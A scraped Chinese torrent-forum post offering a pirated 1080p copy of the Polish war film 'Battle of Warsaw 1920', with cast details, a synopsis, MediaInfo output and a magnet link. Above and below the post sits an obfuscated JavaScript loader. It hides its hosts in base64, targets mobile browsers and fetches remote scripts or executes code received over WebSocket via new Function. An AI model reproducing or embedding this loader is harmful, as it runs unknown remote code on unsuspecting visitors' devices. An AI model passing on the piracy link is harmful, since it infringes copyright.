华沙之战1920[中文字幕].Battle.of.Warsaw.1920.2011.1080p.FriDay.WEB-DL.H264.AAC 4.13GB

版主小s 23天前 217

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 华沙之战1920 / 华沙保卫战 / Battle of Warsaw 1920

◎片 名 Bitwa warszawska 1920

◎年 代 2011

◎产 地 波兰

◎类 别 战争

◎语 言 波兰语

◎上映日期 2011-09-23(波兰)

◎IMDb链接 https://www.imdb.com/title/tt1783244/

◎豆瓣评分 6.5/10 (886人评价)

◎豆瓣链接 https://movie.douban.com/subject/6792369/

◎片 长 111分钟

◎导 演 耶尔齐·霍夫曼 Jerzy Hoffman (id:1032920)

◎编 剧 耶尔齐·霍夫曼 Jerzy Hoffman (id:1032920)

Jaroslaw Sokól Jaroslaw Sokól (id:1302265)

◎演 员 达尼尔·奥勒布里斯基 Daniel Olbrychski (id:1032457)

娜塔莎·厄本斯卡 Natasza Urbanska (id:1232822)

波利斯·席克 Borys Szyc (id:1050178)

格拉日娜·沙波沃夫斯卡 Grazyna Szapolowska (id:1151119)

米哈乌·热布罗夫斯基 Michal Zebrowski (id:1018433)

古尊·伊戈尔 Igor Guzun (id:1463270)

◎标 签 战争 / 波兰 / 历史 / 波兰电影 / 苏俄 / 2011 / 爱情 / 消灭布尔什维克

◎简 介

波兰首部3D片《华沙保卫战》将于9月23日上映。该片反映了1920年波兰人民抵抗苏联红军入侵的著名战役,造价约830万美元,是波兰史上投入最高的影片之一。夹在世界上两个最好战的大国德国与俄罗斯中间的波兰俗称欧洲“垫脚布”——谁出门都要踩上一脚。正是一个多灾多难的国家对历史有种特殊的偏好,广从电影票房上来看,波兰史上最为卖座的四部影片《剑与火》、《塔杜斯先生》、《你往何处去》以及《卡廷惨案》全都是以历史事件为题材的影片。波兰人民的大国理想也只有通过电影这种艺术形式才能得到伸张和舒展。而这部《华沙保卫战》虽然没什么出奇之处,但从气势恢宏的预告片看到波兰的诗人、歌女、神父统统揭竿而起,对苏联两位领导人描绘也是“举重若轻”,倒流露一丝浑不吝的气魄。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 121713797231200154435290107268666064971 (0x5B9139842FE325C40E30E7A1D2C5804B)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.12 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 5 112 kb/s

  10. Encoded date : UTC 2021-11-06 09:36:27

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 3 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 3 frames

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 55 min

  24. Bit rate : 4 982 kb/s

  25. Width : 1 920 pixels

  26. Height : 1 080 pixels

  27. Display aspect ratio : 16:9

  28. Frame rate mode : Constant

  29. Frame rate : 30.000 FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 8 bits

  33. Scan type : Progressive

  34. Bits/(Pixel*Frame) : 0.080

  35. Stream size : 4.02 GiB (97%)

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : AAC LC

  42. Format/Info : Advanced Audio Codec Low Complexity

  43. Codec ID : A_AAC-2

  44. Duration : 1 h 55 min

  45. Bit rate : 128 kb/s

  46. Channel(s) : 2 channels

  47. Channel layout : L R

  48. Sampling rate : 44.1 kHz

  49. Frame rate : 43.066 FPS (1024 SPF)

  50. Compression mode : Lossy

  51. Stream size : 106 MiB (3%)

  52. Language : Polish

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : UTF-8

  58. Codec ID : S_TEXT/UTF8

  59. Codec ID/Info : UTF-8 Plain Text

  60. Duration : 1 h 47 min

  61. Bit rate : 31 b/s

  62. Count of elements : 921

  63. Stream size : 24.8 KiB (0%)

  64. Title : Chinese Simplified

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : UTF-8

  71. Codec ID : S_TEXT/UTF8

  72. Codec ID/Info : UTF-8 Plain Text

  73. Duration : 1 h 47 min

  74. Bit rate : 31 b/s

  75. Count of elements : 921

  76. Stream size : 24.8 KiB (0%)

  77. Title : Chinese Traditional

  78. Language : Chinese

  79. Default : No

  80. Forced : No




复制代码


TAGS 战争

磁力链:
  • magnet:?xt=urn:btih:CF341E4C27A3F35C4124DFDA420016F5283A2DCB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};